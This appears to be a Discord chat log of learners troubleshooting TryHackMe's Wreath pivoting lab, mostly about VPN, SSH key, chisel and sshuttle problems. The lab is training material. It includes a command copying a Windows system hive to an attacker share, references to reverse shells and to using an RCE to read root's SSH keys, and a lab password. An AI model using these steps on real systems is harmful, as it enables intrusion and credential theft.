.100:80 seems to be loading.... It was a PEBCAK error. That was about the only ip/port combo I hadn't tried.
Hi @merry robin , did those VPN events turn out to actually be a replay attack? I'm just curious if that was the case or something more innocuous.
In looking back through my logs, I actually have a few of those yesterday evening
on a different subnet than you
Apr 05 at roughly 00:23-00:36 GMT
even after creating a user on remote desktop i am not getting access
Hey, when's the exact deadline for report submissions for Wreath?
@tardy bloom it's being extended to the 17th because there aren't enough takers yet ๐
You have time
@vocal quail it's looking like a regular OpenVPN error for the setup that's in use for the networks, although it's definitely a weird one. There wasn't any indication that it was caused by any malicious activity certainly.
@calm wedge what does it look like?
noice!
32 pages atm
It's a link to the BC Sec discord -- the Empire developers.
ahh
so i cant connect with chisel client... i added a firewall rule at port 20000 and tried other ports too but no luck.. any idea what i am doing wrong here? tnx
Have you set up the sshuttle as a relay to the first machine?
Not in the last hour
weird ok
Try to look in the /etc/proxychains.conf if there is a proxy on the port 9090
ouu do i need to change it to 9090 right ?
yeah, and then change the foxyproxy port also to that one you choose
now i get it tnx
ahh no luck.. still doesn't work..
is firefox good for proxy or do i need to do it on chrome to make this work?
what command are you using locally to connect to your chisel server on git-serv
and is the connection accepted?
oh I'm looking up now give me a sec
I have a note about a step adding a firewall rule for that port on the prod-serv but I can't recall if that was needed
otherwise everything else looks like what I did
i dont know where the problem is.. maybe resetting will help
isn't 10.200.72.0 @merry robin 's dev network?
72 yea
Oh man you saved me, instead of 118 I gave 72 ... I don't know how this happened
copy paste from the task descriptions?
That will be it
hah! I've actually seen instances of people getting onto that somehow so I figured you were just doing it on that network
sounds like it has a problem with ur id_rsa file
usually it's errors in the file like leading spaces or similar, or it's the permissions of the file
but I already changed the permissions to 600
then it's likely not that error
do I need to download both public and private keys?
can you cat the id_rsa file and paste it here so I can compare with mine?
paste the screenshot, not the text
spoiler tag it too maybe
yes sure
the key is too lengthy. It won't come completely in one screenshot
would 2 screenshots be fine?
ok that looks fine to me
can you chmod +600 id_rsa again and test that seems strange
nop
i'd rename that key and try make it again from scratch maybe
sometimes they are a bit funny for me but I haven't had any problems lately
i downloaded the key again but still
I'll try renaming it
why is it telling me invalid format
Doesn't really matter, someone probably removed the key on the box
so I have to reset I guess
I logged in to box using the exploit but it still shows that the key is there
Check if the right key is authorised
@open nebula use the CVE RCE to cat /root/.ssh/authorized_keys please
how?
@merry robin Am I able to update my report on google drive if there is something I would like to change? Or no editing once its submitted.
@lyric bane yeah, just send a new link if it changes.
I'll always look at the last one submitted by each person and reject the others anyway
Thanks, I updated it and the original link should work.
Is there better way to move the system.bak to my local system than using impacket?
I always get "An unexpected network error occurred
0 file(s) moved"
Can you show a screenshot?
i cannot upload a png here it seems. Anyway I am just using the command `move system.bak \\ATTACKING_IP\share\system.bak`
!docs verify
Follow those steps
Oh boy, someone messed up the network lol
I installed starkiller, all is working fine in cli but in browser i get only white blank page
Anyone welp?
In... browser?
Yes
What's the browser got to do with it?
Don't you start the appimage and connect it to empire?
how to do that?
It's just like a binary
Task and question number?
Notice how this is not a browser
You need to start starkiller.
Then enter the credentials in starkiller.
ook but what's that for?
Like I said, enter the credentials in starkiller
sooooo i am doing wreath again and the id_rsa key on .200 doesn't work, subnet: 96
it doesnt even work to log in to localhost from 10.200.96.200 so its obviously something wrong
i might be doing something wrong haha
??
we can draw this in an application to draw the infrastructure of the network ?
If you want
without cobalt strike ?
That graph is powered by tryhackme, if that's what you mean
You can draw a graph on your own if you want.
You can mark it however you want
Yess i know but I want an application to do that with the beautiful colors and more... same as the THM's graph
So get cobalt strike or make one?
Not C2 just an app to make graph like that
Okey thanks you
@strange bison it can be cool if I do graphs with GNS3 no ?
but it's not beautiful
Do some googling for images to edit and if you're on Windows use paint to create your own graph representation of the network.
You won't be able to talk to .200 unless you have a pivot, right?
network went to sleep?
i have restarted and then try to ssh to prod-serv
i always get ssh: connect to host 10.200.96.200 port 22: No route to host
sounds to me like either the network went to sleep, or perhaps somebody broke the .200 machine somehow- changed firewall rules, killed a service, something like that
if you're sure the network is still running, maybe try another nmap scan on the .200 machine? See if the results are different than your previous scan?
i try tnx
Yeah i just read the first 3 4 modules
My mistake
I panicked that it's going away lolz
Muiri- there's a sentence in task 36 that reads a bit weird. "for all we know, it will pick up any kind of PHP default PHP webshell that we upload..."
It's okay, you're allowed to make mistakes. But that's your allotment for the month!
I blame my testers for not picking up on it
/s
I blame muir for changing it after we tested it and you can't prove otherwise
Yes, clearly this room was not very well tested before being released into the wild </sarcasm>
Muiri, have you considered writing a book(s)? or creating a class?
Is there any way we can see what the defender/AV alert would look like for the bonus item in task 40?
Hm. I think the webserver on my .100 machine has died. I think I might have killed it
I can load the .100:80 page, but it's verrrrry slow (takes several minutes to load, it seems). But I can't load the /resources page anymore. And I can't execute my nc.exe (I accidentally killed my reverse shell with ctrl-c, but now I can't get it back)
I'll try to poke it again tomorrow. Maybe the network needs rest
nvm silly mistake
Can someone explain to me why I am getting "unable to locate starkiller"?
means we can download it using sudo apt install
need some help ssh -i id_rsa root@10.200.96.200
root@10.200.96.200: Permission denied (publickey,gssapi-keyex,gssapi-with-mic).
oh
can you check authorised keys on the host again using the exploit
and see if yours matches?
maybe it changed
it shouldn't tho
might need Muiri if you are connected to the VPN etc correctly
ok i reexploit and redownload the ssh
So its solution for me was to re download (copy the contents of) the id_rsa file
If you will look in github it will suggest to edit gssapi files which might work, however i dont think it will be required in the network.
Just finished the room, learned a ton of new things, thank you all, big kudos to Muiri
i am taking notes and screenshots every step, now i have an account on git-serv
is it "ThreepwoodMightyPirate!"
I love Monkey Island games, so great
when i was young i had a lot of fun with LucasArts games
me too
Is it possible that empire still does not work as it should with that http_hop?
it seems like this time the agent won't even reach out to your attacking machine
The deadline has been extended to the 17th?
Which deadline?
To submit a report of the network.
The new 8.2 release should have it fixed. It not connecting back at all sounds like a firewall problem.
so again when the network restarts the ssh key becomes invalid
i try to reexploit but i can't because port 10000 is not up
Well, I've opened the firewall port, to make sure i created another exception and switched to this other port
but you can reach the host in general right?
have you updated the exploit with the new ip?
10.200.96.200
im not on the right network, i wouldn't know unfortunately
Actually the SSH Key shouldn't change. Not after a normal Restart, just if you are connected to a different Network
I am using the same key for days now
me too until yesterday
if i am connected to a different network why can i ping or nmap...
The key won't change. Make sure it's had a few minutes to restart fully though
i can't see port 10000
i try again later network is 53 min up
stop again in 35 min
GbJ7oAQ232an8AAAARcm9vdEB0bS1wcm9kLXNlcnYBAg== <- last row of ssh key now
J6xOGGwBVPxOZrAAAADnJvb3RAcHJvZC1zZXJ2AQIDBA== <- this morning
┌──(root💀kali)-[/tryhackme/wreath]
└─# ssh -i rsa1 root@10.200.96.200
-bash: /usr/libexec/grepconf.sh: /bin/sh: bad interpreter: No such file or directory
-bash: /usr/libexec/grepconf.sh: /bin/sh: bad interpreter: No such file or directory
-bash: /usr/libexec/grepconf.sh: /bin/sh: bad interpreter: No such file or directory
[root@prod-serv ~]#
and port 10000 disappeared...
something is seriously messed up with your machine
/bin/sh doesnt exist
So I've noticed that the first time I run sshuttle ... &, it only works while the process is active. If I ctrl-z to background it, I can't load the .150 web page anymore. But if I kill it and run it again, it seems stable. Is that something I'm doing wrong, or just a quirk of the program, or something else?
Would it be possible to check the web server on the .92.100 machine? It's still misbehaving for me. Takes forever to load the main page, can't seem to load /resources or my shell at all
Hey, is someone from Brazil?
@dry pendant Ctrl + Z stops the process -- it doesn't background it.
thought that was ctrl+c
ah. well that was half my problem, then
Think of Ctrl + Z almost like a suspension. It doesn't operate, but it's still there
Ctrl + Z is sigstop, Ctrl + C is sigkill (iirc -- might be sigterm)
gotcha. That definitely helps. Totally my fault, then
this other issue I'm having though I think is a broken network. even if I just curl http://10.x.x.100:80/ (or variations on port and slash), I get empty reply (code 52)
Yeah, not sure on that one. I don't have my kali active to check just now :(
gotcha. Anything I can do to check it or restart that service or something, short of voting for a network reset?
I have a chisel server started on the .150 machine through evil-winrm, and a chisel client on my local machine, which reports that it is connected. I opened the firewall port for that yesterday, and was able to get a revshell from .100, but I accidentally killed it with ctrl-c yesterday and haven't been able to get it back since
hm. Running the invoke-portscan command on .150 for the .100 machine reports the system is dead, no ports open or closed
Yeah, sounds like a reset there I'm afraid
yeah, already voted. 2 votes shy, will vote again when I can
yeah, its sigterm because openvpn reports ctrl-c (sigterm)
haha
Hey guys, im on task 17, git server enumeration. I successfully transferred the static nmap binary to the target machine, when I run it however I get this response .syntax error near unexpected token new line
please help lol
I did successfully finish this lab, and when I tried to revise again for my notes I had problems executing the 43777.py file; it says line 18 error. I tried on the local machine and the virtual hack machine as well. Any suggestion on what is wrong??
possibly something on line 18?
Yes but it works before
I did follow guidance and works before and now don't
Read some article about a new update pip3 problems
hmm I don't think it'd be that
none of the IP's have changed since you originally did it I assume?
can you manually copy the exploit again and name it something else and edit it and try that?
I see, not sure then sorry
Thanks anyway
what's the full error?
There are several networks, if you are saying something specific to the network that you're on you need to specify what the 3rd octet of the IP is
how can i exit from empire background job ? do i have to kill the job ?
done with jobs
kill %number
so is wreath a real test or is it a guidedish tour?
both
It's walked through
ty
If you complete it without the walkthrough, you might break something for other users which is quite inconsiderate
might have to reserve some time for it this weekend then
lol, even if you follow the walkthrough you may break something
yes
@strange bison Can you check if the 10.200.92.200 machine is up?
No
ok
Because I'm not on that network
the second time you connect to the git server with the hash i need only sshuttle and winrm right ?
i don't need to reopen firewall...
Correct
tnx
yes
96
i have installed Empire just now
i am reading all before to try...
it's metasploit like i think...
ok
i speak out of experience xD
i know
@dusky ridge what happened? Which task was this on?
which task?
No. 27
what issues are you having now?
well, the web server there is still up
let me see if i can ssh in, hang on
yeah, I'm in to .92.200
wtf
were you able to ssh in before? You sure the id_rsa is good?
yep, 0% packet loss
maybe your vpn died?
maybe i got blacklisted?
On the THM website it says connected
[root@prod-serv ~]# Connection to 10.200.92.200 closed by remote host.
Connection to 10.200.92.200 closed.
That happened
after running the wrong thing
This was my sshuttle
c : Connected to server.
Connection to 10.200.92.200 closed by remote host.
c : fatal: ssh connection to server (pid 3932) exited with returncode 255
screenshot the exact command you're using